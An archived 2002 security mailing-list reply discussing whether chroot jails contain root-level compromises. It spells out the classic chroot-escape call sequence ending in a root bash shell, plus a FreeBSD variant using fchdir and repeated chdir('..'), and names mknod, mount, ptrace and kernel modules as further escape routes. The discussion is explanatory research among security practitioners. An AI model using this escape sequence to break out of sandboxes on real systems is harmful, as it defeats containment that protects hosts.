Vulnerability Development mailing list archives
Re: OT? Are chroots immune to buffer overflows?
From: "Nelson Sampaio Araujo Junior" <nelson () lunenetworks com br>
Date: Fri, 24 May 2002 10:04:15 -0300
Hi,
But If you are able to run code as root, a few syscalls are still available to you : inserting modules and ptrace().
If you're able to run code as root, all you need, in most Un*x systems, is: mkdir("blah"); chroot("blah"); chdir("../../../../../../"); chroot("."); execl("/bin/bash", "bash", NULL);
On others Un*x systems, like some BSDs, an implicit chdir(".") is always made after a chroot, so this doesn't work, but you can still do mknod(2), mount(2), etc..
To start working and prevent this "bug" :) in FreeBSD you can do the following: mkdir("blah"); f = fopen("./afile", "w+"); chroot("blah"); fchdir(f); <== this will prevent the "bug" for(int i=0; i<10000; i++) chdir(".."); chroot("."); Of course, you can enchance the above code to be more efficient just by checking the chdir result. Regards, Nelson Junior nelson () lunenetworks com br nelson () LUNE com br
Current thread:
- OT? Are chroots immune to buffer overflows? Jason Haar (May 21)
- Re: OT? Are chroots immune to buffer overflows? SpaceWalker (May 22)
- Re: OT? Are chroots immune to buffer overflows? Luciano Miguel Ferreira Rocha (May 23)
- Re: OT? Are chroots immune to buffer overflows? Nelson Sampaio Araujo Junior (May 24)
- Re: OT? Are chroots immune to buffer overflows? aazubel (May 23)
- Re: OT? Are chroots immune to buffer overflows? Luciano Miguel Ferreira Rocha (May 23)
- Re: OT? Are chroots immune to buffer overflows? Valdis . Kletnieks (May 22)
- Re: OT? Are chroots immune to buffer overflows? Kalle Andersson (May 22)
- Re: OT? Are chroots immune to buffer overflows? KF (May 23)
- Re: OT? Are chroots immune to buffer overflows? Edwin Groothuis (May 22)
- Re: OT? Are chroots immune to buffer overflows? Jose Nazario (May 23)
- Re: OT? Are chroots immune to buffer overflows? Kurt Seifried (May 23)
- Re: OT? Are chroots immune to buffer overflows? Berend De Schouwer (May 22)
- Re: OT? Are chroots immune to buffer overflows? L. Walker (May 22)
- Re: OT? Are chroots immune to buffer overflows? Jan Werner (May 23)
(Thread continues...)
- Re: OT? Are chroots immune to buffer overflows? SpaceWalker (May 22)